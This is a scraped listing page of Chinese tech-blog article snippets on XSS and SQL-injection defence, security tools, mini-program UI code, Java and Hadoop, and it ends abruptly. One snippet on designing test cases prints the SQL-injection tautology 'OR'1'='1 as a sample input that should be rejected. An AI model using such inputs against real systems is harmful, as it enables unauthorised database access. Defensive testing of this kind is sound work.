                           title="XSS和sql注入部分场景测试用例样例" target="_blank">XSS和sql注入部分场景测试用例样例</a>
                        <span class="text-muted">谷隐凡二</span>
<a class="tag" taget="_blank" href="/search/%E6%B5%8B%E8%AF%95/1.htm">测试</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E6%B5%8B%E8%AF%95%E7%94%A8%E4%BE%8B/1.htm">测试用例</a>
                        <div>目录1.SQL注入测试用例设计基本SQL注入复杂SQL注入盲注测试2.XSS攻击测试用例设计基本XSS攻击复杂XSS攻击DOM-basedXSS1.SQL注入测试用例设计SQL注入攻击通常通过在输入字段中插入恶意SQL代码，试图操纵数据库查询。设计这些测试用例时，需要涵盖各种常见的SQL注入技术。基本SQL注入用例1:使用单引号:输入:'OR'1'='1预期结果:应拒绝输入并返回错误消息，不应允许</div>
                    </li>
                    <li><a href="/article/1832853952610267136.htm"
                           title="【网络安全】如何预防xss" target="_blank">【网络安全】如何预防xss</a>
                        <span class="text-muted">不会代码的小徐</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>XSS(Cross-SiteScripting，跨站脚本攻击)是一种代码注入攻击。攻击者通过在目标网站注入恶意脚本，使其在用户浏览器中执行，从而窃取用户敏感信息如Cookie和SessionID。CSS在前端已经被用了，为了避免歧义用了XSS作为缩写。XSS的本质是恶意代码与网站正常代码混在一起，浏览器无法分辨它们的可信度，最终导致恶意代码被执行。XSS的危害浏览器无法区分恶意代码和正常代码，它们</div>
                    </li>
                    <li><a href="/article/1832768596707733504.htm"
                           title="ASP.NET Core 入门教学十六 防止常见的Web攻击" target="_blank">ASP.NET Core 入门教学十六 防止常见的Web攻击</a>
                        <span class="text-muted">充值内卷</span>
<a class="tag" taget="_blank" href="/search/asp.net/1.htm">asp.net</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%90%8E%E7%AB%AF/1.htm">后端</a>
                        <div>在ASP.NETCore中，防止常见的Web攻击是非常重要的，以确保应用程序的安全性。以下是一些常见的Web攻击类型及其防范措施：1.跨站脚本攻击（XSS）跨站脚本攻击（XSS）是一种通过在网页中注入恶意脚本来攻击用户的浏览器的技术。为了防止XSS攻击，可以采取以下措施：输入验证：对用户输入进行严格的验证和清理。输出编码：在将用户输入的数据插入到HTML页面中时，进行适当的编码。ASP.NETCo</div>
                    </li>
                    <li><a href="/article/1832592857161101312.htm"
                           title="HtmlSanitizer: 一个保护你的网站免受XSS攻击的.Net开源项目" target="_blank">HtmlSanitizer: 一个保护你的网站免受XSS攻击的.Net开源项目</a>
                        <span class="text-muted">编程乐趣</span>
<a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/.net/1.htm">.net</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a>
                        <div>Html跨站脚本攻击（XSS）是非常常见的，比如博客评论、论坛帖子、社交媒体发布动态等一些用户提交文本的地方，都有可能遭受恶意提交Html代码。为了确保用户提交内容的安全，我们就需要对用户提交内容进行过滤。01项目简介HtmlSanitizer是一个强大的库，它能够审查和清理HTML内容，移除或转义那些可能被用于XSS攻击的标签和属性。这个工具的核心功能是提供一个安全的方式来处理用户提交的HTML</div>
                    </li>
                    <li><a href="/article/1832422786732224512.htm"
                           title="Vue + ElementUI 实现全国各个省份相对应城市的联动选择_vue+elementui 省市区联动" target="_blank">Vue + ElementUI 实现全国各个省份相对应城市的联动选择_vue+elementui 省市区联动</a>
                        <span class="text-muted">2401_84617681</span>
<a class="tag" taget="_blank" href="/search/%E7%A8%8B%E5%BA%8F%E5%91%98/1.htm">程序员</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95/1.htm">面试</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a>
                        <div>打开全栈工匠技能包-1小时轻松掌握SSR两小时精通jq+bs插件开发生产环境下如歌部署Node.js开源分享：【大厂前端面试题解析+核心总结学习笔记+真实项目实战+最新讲解视频】网易内部VUE自定义插件库NPM集成谁说前端不用懂安全，XSS跨站脚本的危害webpack的loader到底是什么样的？两小时带你写一个自己loader:rules="rules"label-width="150px">定</div>
                    </li>
                    <li><a href="/article/1832250071379439616.htm"
                           title="【无标题】XSS安全防护：responseBody （输入流可重复读） 配置" target="_blank">【无标题】XSS安全防护：responseBody （输入流可重复读） 配置</a>
                        <span class="text-muted">syfjava</span>
<a class="tag" taget="_blank" href="/search/RuoYi-Vue-Plus/1.htm">RuoYi-Vue-Plus</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/RuoYi-Vue-Plus/1.htm">RuoYi-Vue-Plus</a>
                        <div>接上文：配置XSS过滤器XXS安全防护：拦截器+注解实现校验-CSDN博客XSS（跨站脚本）攻击是一种网络安全威胁，允许攻击者注入恶意脚本到看似安全的网站。当用户浏览这些被注入恶意代码的网页时，恶意脚本会在用户的浏览器环境中执行，这可能导致多种安全问题，如窃取敏感数据、劫持用户会话等。这些攻击利用了应用程序对用户输入处理不当的问题。预防方法包括输入验证、输出编码等。https://blog.csd</div>
                    </li>
                    <li><a href="/article/1832235444989947904.htm"
                           title="Node.js 入门：中间件与安全性深度解析" target="_blank">Node.js 入门：中间件与安全性深度解析</a>
                        <span class="text-muted">Switch616</span>
<a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/node.js/1.htm">node.js</a><a class="tag" taget="_blank" href="/search/%E4%B8%AD%E9%97%B4%E4%BB%B6/1.htm">中间件</a><a class="tag" taget="_blank" href="/search/chrome/1.htm">chrome</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a><a class="tag" taget="_blank" href="/search/%E6%9E%B6%E6%9E%84/1.htm">架构</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF%E6%A1%86%E6%9E%B6/1.htm">前端框架</a>
                        <div>Node.js入门：中间件与安全性深度解析目录认证与授权使用jsonwebtoken实现JWT身份验证用户注册与登录：认证流程与实践️权限管理：安全访问控制详解️安全性防止SQL注入：参数化查询与ORM的最佳实践防止XSS攻击：用户输入处理与安全防护使用HTTPS和SSL/TLS：加密传输与数据安全⚠️错误处理️全局错误处理：确保应用稳定性的关键异常捕获与日志记录：有效排查问题的核心认证与授权使用</div>
                    </li>
                    <li><a href="/article/1832184001641672704.htm"
                           title="Java12 Excel和Json文件解析" target="_blank">Java12 Excel和Json文件解析</a>
                        <span class="text-muted">Stringzhua</span>
<a class="tag" taget="_blank" href="/search/JavaSE/1.htm">JavaSE</a><a class="tag" taget="_blank" href="/search/excel/1.htm">excel</a><a class="tag" taget="_blank" href="/search/json/1.htm">json</a>
                        <div>Excel文件解析：Excel文件解析(EasyExcel框架解析)Excel文件解析(ApachePOl框架解析)（1）Excel文件对象创建：POI《1》创建工作簿对象:XSSFWorkbookworkbook=newXSSFWorkbook（）；《2》创建工作表对象：XSSFSheetsheet=workbook.createSheet();《3》创建行对象：Rowrow=sheet.cre</div>
                    </li>
                    <li><a href="/article/1832145171924480000.htm"
                           title="【网络安全】Bingbot索引投毒实现储存型XSS" target="_blank">【网络安全】Bingbot索引投毒实现储存型XSS</a>
                        <span class="text-muted">秋说</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/1.htm">漏洞挖掘</a>
                        <div>未经许可，不得转载。文章目录前言Bingbot如何运作正文漏洞步骤前言Bing是由微软开发的搜索引擎，提供网页、视频、图片和地图等多种搜索功能。其目标是通过呈现有条理且相关的搜索结果，帮助用户做出更明智的决策。Bingbot是微软开发的网络爬虫，也被称为蜘蛛或搜索引擎机器人，主要用于探索和索引Bing搜索引擎的网页。自2010年10月推出以来，Bingbot通过外部和内部链接发现新网页，并更新已存</div>
                    </li>
                    <li><a href="/article/1832029720938639360.htm"
                           title="微信小程序手写签名，使用canvas 2d 丝滑连笔，不卡顿" target="_blank">微信小程序手写签名，使用canvas 2d 丝滑连笔，不卡顿</a>
                        <span class="text-muted">無苼</span>
<a class="tag" taget="_blank" href="/search/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">微信小程序</a><a class="tag" taget="_blank" href="/search/%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">小程序</a>
                        <div>最近产品让我写个手写签名，上网百度了一下，基本上快速连笔都很卡，于是自己参考资料重写了一下，体验效果拉满，话不多说上代码。WXML代码重签确认WXSSpage{background-color:#e7e7e7;}.btn{width:100%;display:flex;justify-content:space-around;align-items:center;height:60px;posit</div>
                    </li>
                    <li><a href="/article/1832003242897272832.htm"
                           title="SecurityHeaders：为.Net网站添加安全标头，让Web更加安全、避免攻击！" target="_blank">SecurityHeaders：为.Net网站添加安全标头，让Web更加安全、避免攻击！</a>
                        <span class="text-muted">编程乐趣</span>
<a class="tag" taget="_blank" href="/search/.net/1.htm">.net</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a>
                        <div>网站的安全对于任何一家公司都是非常重要的。为了保证Web安全，其中Http安全标头就是非常重要一个的措施。设定正确的安全头可以增强网站的安全性，因为它们可以帮助防止各种网络攻击，如跨站脚本（XSS）、点击劫持（Clickjacking）和内容类型嗅探（ContentTypeSniffing）等。下面推荐一个开源项目，可以让我们轻松地添加安全相关的HTTP头到网站中。01项目简介NetEscapad</div>
                    </li>
                    <li><a href="/article/1831723130805121024.htm"
                           title="React系列之虚拟DOM、FIBER和DIFF算法" target="_blank">React系列之虚拟DOM、FIBER和DIFF算法</a>
                        <span class="text-muted">小小小菜鱼</span>
<a class="tag" taget="_blank" href="/search/react/1.htm">react</a><a class="tag" taget="_blank" href="/search/react.js/1.htm">react.js</a><a class="tag" taget="_blank" href="/search/%E7%AE%97%E6%B3%95/1.htm">算法</a><a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a>
                        <div>文章目录虚拟DOM和DIFF算法虚拟DOM虚拟DOM对象虚拟DOM的优势预防XSSDIFF算法旧的DIFF算法Fiber树渲染过程算法过程key的作用虚拟DOM和DIFF算法虚拟DOMReact使用虚拟DOM来更新真正的DOM。DOM表示“文档对象模型”，浏览器遵循HTML指令来构造文档对象模型。当浏览器加载HTML并呈现用户界面时，HTML文档中所有元素都会变成DOM元素。每次DOM更新的时候都</div>
                    </li>
                    <li><a href="/article/1831496459166511104.htm"
                           title="零基础转行学网络安全怎么样？能找到什么样的工作？" target="_blank">零基础转行学网络安全怎么样？能找到什么样的工作？</a>
                        <span class="text-muted">爱吃小石榴16</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a>
                        <div>网络安全对于现代社会来说变得越来越重要，但是很多人对于网络安全的知识却知之甚少。那么，零基础小白可以学网络安全吗？答案是肯定的。零基础转行学习网络安全是完全可行的，但需要明确的是，网络安全是一个既广泛又深入的领域，包含了网络协议、系统安全、应用安全、密码学、渗透测试、漏洞挖掘、安全编程、安全运维等多个方面。。网络安全是一个快速发展的领域，对专业人才的需求不断增长。以下是一些关于零基础转行学习网络安</div>
                    </li>
                    <li><a href="/article/1831251942815395840.htm"
                           title="网站安全检测：推荐 8 款免费的 Web 安全测试工具" target="_blank">网站安全检测：推荐 8 款免费的 Web 安全测试工具</a>
                        <span class="text-muted">白帽黑客2659</span>
<a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E6%B5%8B%E8%AF%95%E5%B7%A5%E5%85%B7/1.htm">测试工具</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a><a class="tag" taget="_blank" href="/search/ddos/1.htm">ddos</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a>
                        <div>目录1.OWASPZAP(ZedAttackProxy)2.BurpSuiteFreeEdition3.Nikto4.w3af5.SQLMap6.Arachni7.XSSer8.SecurityHeaders.io使用这些工具的建议网站安全是确保数据保护和系统完整性的重要组成部分。对于希望增强网站安全性的开发者和管理员来说，利用有效的工具进行定期的安全测试是必不可少的。以下是8款免费的Web安全测</div>
                    </li>
                    <li><a href="/article/1831020239534518272.htm"
                           title="微信小程序：自定义扫码功能" target="_blank">微信小程序：自定义扫码功能</a>
                        <span class="text-muted">dingcho</span>
<a class="tag" taget="_blank" href="/search/%E4%B8%89%E6%96%B9%E5%BC%80%E5%8F%91/1.htm">三方开发</a><a class="tag" taget="_blank" href="/search/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">微信小程序</a><a class="tag" taget="_blank" href="/search/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F%E8%87%AA%E5%AE%9A%E4%B9%89%E6%8B%8D%E7%85%A7/1.htm">微信小程序自定义拍照</a>
                        <div>我们今天主要是介绍小程序自定义扫码的应用，相关业务处理可以根据自己需求来填补WXML：请将摄像头对准VIN号轻触照亮扫一扫取消WXSS:page{font-family:PingFangSC-Regular,PingFangSC;font-size:24rpx;background-color:#F8F7FB;}.flex-center{display:flex;justify-content:c</div>
                    </li>
                    <li><a href="/article/1830866462890356736.htm"
                           title="微信小程序把阿里icon变为组件" target="_blank">微信小程序把阿里icon变为组件</a>
                        <span class="text-muted">aleluye</span>
<a class="tag" taget="_blank" href="/search/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">微信小程序</a><a class="tag" taget="_blank" href="/search/%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">小程序</a><a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a>
                        <div>js文件：// components/icon/iconfont.jsComponent({  /**   * 组件的属性列表   */  properties: {    size: String,    color: String,    icon: String  }}）json组件{"component":true,"usingComponents":{}}wxmlwxss/*compon</div>
                    </li>
                    <li><a href="/article/1830726423149637632.htm"
                           title="Web安全之XSS跨站脚本攻击" target="_blank">Web安全之XSS跨站脚本攻击</a>
                        <span class="text-muted">Shadow_143</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.htm">渗透测试</a>
                        <div>1.XSS漏洞简介XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java，VBScript，ActiveX，Flash或者甚至是普通的HTML。攻击成功后，攻击者可能得到更高的权限（如执行一些操作）、私密网页内容、会话和cookie等各种内容。2.XSS</div>
                    </li>
                                <li><a href="/article/58.htm"
                                       title="多线程编程之理财" target="_blank">多线程编程之理财</a>
                                    <span class="text-muted">周凡杨</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E5%A4%9A%E7%BA%BF%E7%A8%8B/1.htm">多线程</a><a class="tag" taget="_blank" href="/search/%E7%94%9F%E4%BA%A7%E8%80%85/1.htm">生产者</a><a class="tag" taget="_blank" href="/search/%E6%B6%88%E8%B4%B9%E8%80%85/1.htm">消费者</a><a class="tag" taget="_blank" href="/search/%E7%90%86%E8%B4%A2/1.htm">理财</a>
                                    <div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 现实生活中，我们一边工作，一边消费，正常情况下会把多余的钱存起来，比如存到余额宝，还可以多挣点钱，现在就有这个情况：我每月可以发工资20000万元 （暂定每月的1号），每月消费5000（租房+生活费）元（暂定每月的1号），其中租金是大头占90%，交房租的方式可以选择（一月一交，两月一交、三月一交），理财：1万元存余额宝一天可以赚1元钱，</div>
                                </li>
                                <li><a href="/article/185.htm"
                                       title="[Zookeeper学习笔记之三]Zookeeper会话超时机制" target="_blank">[Zookeeper学习笔记之三]Zookeeper会话超时机制</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/zookeeper/1.htm">zookeeper</a>
                                    <div>首先，会话超时是由Zookeeper服务端通知客户端会话已经超时，客户端不能自行决定会话已经超时，不过客户端可以通过调用Zookeeper.close()主动的发起会话结束请求，如下的代码输出内容 
Created /zoo-739160015 
CONNECTEDCONNECTED 
.............CONNECTEDCONNECTED 
CONNECTEDCLOSEDCLOSED 
</div>
                                </li>
                                <li><a href="/article/312.htm"
                                       title="SecureCRT快捷键" target="_blank">SecureCRT快捷键</a>
                                    <span class="text-muted">daizj</span>
<a class="tag" taget="_blank" href="/search/secureCRT/1.htm">secureCRT</a><a class="tag" taget="_blank" href="/search/%E5%BF%AB%E6%8D%B7%E9%94%AE/1.htm">快捷键</a>
                                    <div>ctrl + a : 移动光标到行首ctrl + e ：移动光标到行尾crtl + b: 光标前移1个字符crtl +&nbsp;f: 光标后移1个字符crtl +&nbsp;h&nbsp;: 删除光标之前的一个字符ctrl + d ：删除光标之后的一个字符crtl + k ：删除光标到行尾所有字符crtl +&nbsp;u : 删除光标至行首所有字符crtl + w:&nbsp; 删除光标至行首</div>
                                </li>
                                <li><a href="/article/439.htm"
                                       title="Java 子类与父类这间的转换" target="_blank">Java 子类与父类这间的转换</a>
                                    <span class="text-muted">周凡杨</span>
<a class="tag" taget="_blank" href="/search/java+%E7%88%B6%E7%B1%BB%E4%B8%8E%E5%AD%90%E7%B1%BB%E7%9A%84%E8%BD%AC%E6%8D%A2/1.htm">java 父类与子类的转换</a>
                                    <div>&nbsp; &nbsp; 最近同事调的一个服务报错，查看后是日期之间转换出的问题。代码里是把 java.sql.Date 类型的对象 强制转换为 java.sql.Timestamp 类型的对象。报java.lang.ClassCastException。 
&nbsp; 
&nbsp; &nbsp; 代码： 
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </div>
                                </li>
                                <li><a href="/article/566.htm"
                                       title="可视化swing界面编辑" target="_blank">可视化swing界面编辑</a>
                                    <span class="text-muted">朱辉辉33</span>
<a class="tag" taget="_blank" href="/search/eclipse/1.htm">eclipse</a><a class="tag" taget="_blank" href="/search/swing/1.htm">swing</a>
                                    <div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 今天发现了一个WindowBuilder插件，功能好强大，啊哈哈，从此告别手动编辑swing界面代码，直接像VB那样编辑界面，代码会自动生成。 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 首先在Eclipse中点击help，选择Install New Software,然后在Work with中输入WindowBui</div>
                                </li>
                                <li><a href="/article/693.htm"
                                       title="web报表工具FineReport常用函数的用法总结（文本函数）" target="_blank">web报表工具FineReport常用函数的用法总结（文本函数）</a>
                                    <span class="text-muted">老A不折腾</span>
<a class="tag" taget="_blank" href="/search/finereport/1.htm">finereport</a><a class="tag" taget="_blank" href="/search/web%E6%8A%A5%E8%A1%A8%E5%B7%A5%E5%85%B7/1.htm">web报表工具</a><a class="tag" taget="_blank" href="/search/%E6%8A%A5%E8%A1%A8%E8%BD%AF%E4%BB%B6/1.htm">报表软件</a><a class="tag" taget="_blank" href="/search/java%E6%8A%A5%E8%A1%A8/1.htm">java报表</a>
                                    <div>文本函数 
CHAR 
CHAR(number):根据指定数字返回对应的字符。CHAR函数可将计算机其他类型的数字代码转换为字符。 
Number:用于指定字符的数字，介于1Number:用于指定字符的数字，介于165535之间（包括1和65535）。 
示例: 
CHAR(88)等于“X”。 
CHAR(45)等于“-”。 
&nbsp; 
CODE 
CODE(text):计算文本串中第一个字</div>
                                </li>
                                <li><a href="/article/820.htm"
                                       title="mysql安装出错" target="_blank">mysql安装出错</a>
                                    <span class="text-muted">林鹤霄</span>
<a class="tag" taget="_blank" href="/search/mysql%E5%AE%89%E8%A3%85/1.htm">mysql安装</a>
                                    <div>[root@localhost ~]# rpm -ivh MySQL-server-5.5.24-1.linux2.6.x86_64.rpm&nbsp;Preparing...&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #####################</div>
                                </li>
                                <li><a href="/article/947.htm"
                                       title="linux下编译libuv" target="_blank">linux下编译libuv</a>
                                    <span class="text-muted">aigo</span>
<a class="tag" taget="_blank" href="/search/libuv/1.htm">libuv</a>
                                    <div>下载最新版本的libuv源码，解压后执行： 
./autogen.sh 
&nbsp; 
这时会提醒找不到automake命令，通过一下命令执行安装（redhat系用yum，Debian系用apt-get）： 
# yum -y install automake 
# yum -y install libtool 
&nbsp; 
&nbsp; 
如果提示错误：make: *** No targe</div>
                                </li>
                                <li><a href="/article/1074.htm"
                                       title="中国行政区数据及三级联动菜单" target="_blank">中国行政区数据及三级联动菜单</a>
                                    <span class="text-muted">alxw4616</span>

                                    <div>近期做项目需要三级联动菜单,上网查了半天竟然没有发现一个能直接用的! 
呵呵,都要自己填数据....我了个去这东西麻烦就麻烦的数据上. 
哎,自己没办法动手写吧. 
现将这些数据共享出了,以方便大家.嗯,代码也可以直接使用 
&nbsp; 文件说明 
 
 lib\area.sql -- 县及县以上行政区划分代码（截止2013年8月31日)来源：国家统计局 发布时间：2014-01-17 15:0</div>
                                </li>
                                <li><a href="/article/1201.htm"
                                       title="哈夫曼加密文件" target="_blank">哈夫曼加密文件</a>
                                    <span class="text-muted">百合不是茶</span>
<a class="tag" taget="_blank" href="/search/%E5%93%88%E5%A4%AB%E6%9B%BC%E5%8E%8B%E7%BC%A9/1.htm">哈夫曼压缩</a><a class="tag" taget="_blank" href="/search/%E5%93%88%E5%A4%AB%E6%9B%BC%E5%8A%A0%E5%AF%86/1.htm">哈夫曼加密</a><a class="tag" taget="_blank" href="/search/%E4%BA%8C%E5%8F%89%E6%A0%91/1.htm">二叉树</a>
                                    <div>&nbsp;在上一篇介绍过哈夫曼编码的基础知识,下面就直接介绍使用哈夫曼编码怎么来做文件加密或者压缩与解压的软件,对于新手来是有点难度的,主要还是要理清楚步骤; 
&nbsp; 
加密步骤: 
&nbsp;1,统计文件中字节出现的次数,作为权值 
&nbsp; 
2,创建节点和哈夫曼树 
&nbsp; 
3,得到每个子节点01串 
&nbsp; 
4,使用哈夫曼编码表示每个字节 
&nbsp; 
</div>
                                </li>
                                <li><a href="/article/1328.htm"
                                       title="JDK1.5 Cyclicbarrier实例" target="_blank">JDK1.5 Cyclicbarrier实例</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/thread/1.htm">thread</a><a class="tag" taget="_blank" href="/search/java%E5%A4%9A%E7%BA%BF%E7%A8%8B/1.htm">java多线程</a><a class="tag" taget="_blank" href="/search/Cyclicbarrier/1.htm">Cyclicbarrier</a>
                                    <div>CyclicBarrier类 
一个同步辅助类，它允许一组线程互相等待，直到到达某个公共屏障点 (common barrier point)。在涉及一组固定大小的线程的程序中，这些线程必须不时地互相等待，此时 CyclicBarrier 很有用。因为该 barrier 在释放等待线程后可以重用，所以称它为循环的 barrier。 
CyclicBarrier支持一个可选的 Runnable 命令，</div>
                                </li>
                                <li><a href="/article/1455.htm"
                                       title="九项重要的职业规划" target="_blank">九项重要的职业规划</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/%E5%B7%A5%E4%BD%9C/1.htm">工作</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a>
                                    <div>一. 学习的步伐不停止&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 古人说，活到老，学到老。终身学习应该是您的座右铭。&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 世界在不断变化，每个人都在寻找各自的事业途径。&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 您只有保证了足够的技能储</div>
                                </li>
                                <li><a href="/article/1582.htm"
                                       title="【Java范型四】范型方法" target="_blank">【Java范型四】范型方法</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                                    <div>范型参数不仅仅可以用于类型的声明上，例如 
&nbsp; 
package com.tom.lang.generics;

import java.util.List;

public class Generics&lt;T&gt; {
    private T value;
    public Generics(T  value) {
        this.value = </div>
                                </li>
                                <li><a href="/article/1709.htm"
                                       title="【Hadoop十三】HDFS Java API基本操作" target="_blank">【Hadoop十三】HDFS Java API基本操作</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/hadoop/1.htm">hadoop</a>
                                    <div>&nbsp; 
package com.examples.hadoop;

import org.apache.hadoop.conf.Configuration;

import org.apache.hadoop.fs.FSDataInputStream;
import org.apache.hadoop.fs.FileStatus;
import org.apache.hadoo</div>
                                </li>
                                <li><a href="/article/1836.htm"
                                       title="ua实现split字符串分隔" target="_blank">ua实现split字符串分隔</a>
                                    <span class="text-muted">ronin47</span>
<a class="tag" taget="_blank" href="/search/lua+split/1.htm">lua split</a>
                                    <div>LUA并不象其它许多&quot;大而全&quot;的语言那样，包括很多功能，比如网络通讯、图形界面等。但是LUA可以很容易地被扩展：由宿主语言(通常是C或 C++)提供这些功能，LUA可以使用它们，就像是本来就内置的功能一样。LUA只包括一个精简的核心和最基本的库。这使得LUA体积小、启动速度快，从 而适合嵌入在别的程序里。因此在lua中并没有其他语言那样多的系统函数。习惯了其他语言的字符串分割函</div>
                                </li>
                                <li><a href="/article/1963.htm"
                                       title="java-从先序遍历和中序遍历重建二叉树" target="_blank">java-从先序遍历和中序遍历重建二叉树</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                                    <div>

public class BuildTreePreOrderInOrder {

	/**
	 * Build Binary Tree from PreOrder and InOrder
	 *  _______7______
       /              \
    __10__          ___2
   /      \        /
   4</div>
                                </li>
                                <li><a href="/article/2090.htm"
                                       title="openfire开发指南《连接和登陆》" target="_blank">openfire开发指南《连接和登陆》</a>
                                    <span class="text-muted">开窍的石头</span>
<a class="tag" taget="_blank" href="/search/openfire/1.htm">openfire</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E6%8C%87%E5%8D%97/1.htm">开发指南</a><a class="tag" taget="_blank" href="/search/smack/1.htm">smack</a>
                                    <div>第一步 
&nbsp;&nbsp;&nbsp; 官网下载smack.jar包 
&nbsp;&nbsp;&nbsp; 下载地址：http://www.igniterealtime.org/downloads/index.jsp#smack 
第二步 
&nbsp;&nbsp;&nbsp; 把smack里边的jar导入你新建的java项目中 
 
开始编写smack连接openfire代码 
 
p</div>
                                </li>
                                <li><a href="/article/2217.htm"
                                       title="[移动通讯]手机后盖应该按需要能够随时开启" target="_blank">[移动通讯]手机后盖应该按需要能够随时开启</a>
                                    <span class="text-muted">comsci</span>
<a class="tag" taget="_blank" href="/search/%E7%A7%BB%E5%8A%A8/1.htm">移动</a>
                                    <div>&nbsp;&nbsp;&nbsp; 看到新的手机，很多由金属材质做的外壳，内存和闪存容量越来越大，CPU速度越来越快，对于这些改进，我们非常高兴，也非常欢迎 
 
&nbsp;&nbsp;&nbsp;&nbsp; 但是，对于手机的新设计，有几点我们也要注意 
 
&nbsp;&nbsp;&nbsp;&nbsp; 第一：手机的后盖应该能够被用户自行取下来，手机的电池的可更换性应该是必须保留的设计,</div>
                                </li>
                                <li><a href="/article/2344.htm"
                                       title="20款国外知名的php开源cms系统" target="_blank">20款国外知名的php开源cms系统</a>
                                    <span class="text-muted">cuiyadll</span>
<a class="tag" taget="_blank" href="/search/cms/1.htm">cms</a>
                                    <div>内容管理系统，简称CMS，是一种简易的发布和管理新闻的程序。用户可以在后端管理系统中发布，编辑和删除文章，即使您不需要懂得HTML和其他脚本语言，这就是CMS的优点。 
在这里我决定介绍20款目前国外市面上最流行的开源的PHP内容管理系统，以便没有PHP知识的读者也可以通过国外内容管理系统建立自己的网站。 
1.&nbsp;Wordpress 
WordPress的是一个功能强大且易于使用的内容管</div>
                                </li>
                                <li><a href="/article/2471.htm"
